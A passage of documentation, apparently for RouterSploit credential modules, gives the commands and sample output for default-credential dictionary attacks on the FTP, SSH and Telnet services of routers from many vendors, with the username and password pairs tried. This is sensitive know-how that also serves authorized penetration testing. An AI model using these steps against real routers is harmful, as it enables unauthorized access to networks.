[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Belkin Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/belkin/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/belkin/ssh_default_creds
rsf (Belkin Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Belkin Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Belkin Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/belkin/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/belkin/telnet_default_creds
rsf (Belkin Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Belkin Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Bhu Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/bhu/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/bhu/ftp_default_creds
rsf (Bhu Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Bhu Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Bhu Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/bhu/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/bhu/ssh_default_creds
rsf (Bhu Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Bhu Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Bhu Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/bhu/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/bhu/telnet_default_creds
rsf (Bhu Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Bhu Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Billion Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/billion/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/billion/ftp_default_creds
rsf (Billion Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Billion Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Billion Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/billion/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/billion/ssh_default_creds
rsf (Billion Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Billion Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Billion Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/billion/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/billion/telnet_default_creds
rsf (Billion Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Billion Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Cisco Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/cisco/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/cisco/ftp_default_creds
rsf (Cisco Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Cisco Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/cisco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/cisco/ssh_default_creds
rsf (Cisco Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Cisco Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/cisco/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/cisco/telnet_default_creds
rsf (Cisco Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Comtrend Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/comtrend/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/comtrend/ftp_default_creds
rsf (Comtrend Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Comtrend Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Comtrend Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/comtrend/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/comtrend/ssh_default_creds
rsf (Comtrend Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Comtrend Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Comtrend Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/comtrend/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/comtrend/telnet_default_creds
rsf (Comtrend Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Comtrend Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against D-Link Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/dlink/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/dlink/ftp_default_creds
rsf (D-Link Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against D-Link Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/dlink/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/dlink/ssh_default_creds
rsf (D-Link Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against D-Link Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/dlink/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/dlink/telnet_default_creds
rsf (D-Link Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Fortined Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/fortinet/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/fortinet/ftp_default_creds
rsf (Fortinet Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Fortinet Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Fortinet Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/fortinet/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/fortinet/ssh_default_creds
rsf (Fortinet Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Fortinet Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Fortinet Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/fortinet/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/fortinet/telnet_default_creds
rsf (Fortinet Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Fortinet Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Huawei Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/huawei/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/huawei/ftp_default_creds
rsf (Huawei Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Huawei Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Huawei Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/huawei/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/huawei/ssh_default_creds
rsf (Huawei Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Huawei Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Huawei Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/huawei/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/huawei/telnet_default_creds
rsf (Huawei Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Huawei Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against IPFire Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/ipfire/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/ipfire/ftp_default_creds
rsf (IPFire Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IPFire Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against IPFire Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/ipfire/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/ipfire/ssh_default_creds
rsf (IPFire Router Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IPFire Router Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against IPFire Router Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/ipfire/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/ipfire/telnet_default_creds
rsf (IPFire Router Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IPFire Router Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Juniper Router FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/routers/juniper/ftp_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/routers/juniper/ftp_default_creds
rsf (Juniper Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Juniper Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Juniper Router SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
